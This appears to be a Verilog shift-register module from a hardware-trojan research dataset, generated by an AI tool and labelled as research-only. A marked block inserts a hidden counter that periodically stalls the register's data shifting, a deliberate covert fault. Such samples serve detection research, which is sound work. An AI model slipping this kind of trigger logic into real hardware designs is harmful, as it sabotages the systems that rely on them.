// TROJANED DESIGN - RESEARCH USE ONLY
// Generated by GHOST_Trojan_GPT on 2026-05-03 21:39:19
// Original: shift_reg.v
// Vulnerability: T3
// Model: gpt-4o
// Version: 1
// WARNING: This design contains intentionally inserted vulnerabilities for research purposes

module shift_reg(
    input clk, rst, shift_in,
    output reg [7:0] data_out
);

// trojan_insertion_begin
// Vulnerability: Added rare-condition stall mechanism
reg [3:0] rare_condition_counter; // Counter to trigger the rare condition
reg stall; // Register to hold the stall state

always @(posedge clk or posedge rst) begin
    if (rst) begin
        rare_condition_counter <= 4'b0;
        stall <= 1'b0;
    end else begin
        if (rare_condition_counter == 4'd12) begin
            stall <= 1'b1;
        end
        if (stall == 1'b0) begin
            rare_condition_counter <= rare_condition_counter + 1'b1;
        end else begin
            stall <= 1'b0; // Release stall after one cycle
        end
    end
end
// trojan_insertion_end

always @(posedge clk or posedge rst) begin
    if (rst) begin
        data_out <= 8'b0;
    end else if (!stall) begin // Data shift happens only if not stalled
        data_out <= {data_out[6:0], shift_in};
    end
end

endmodule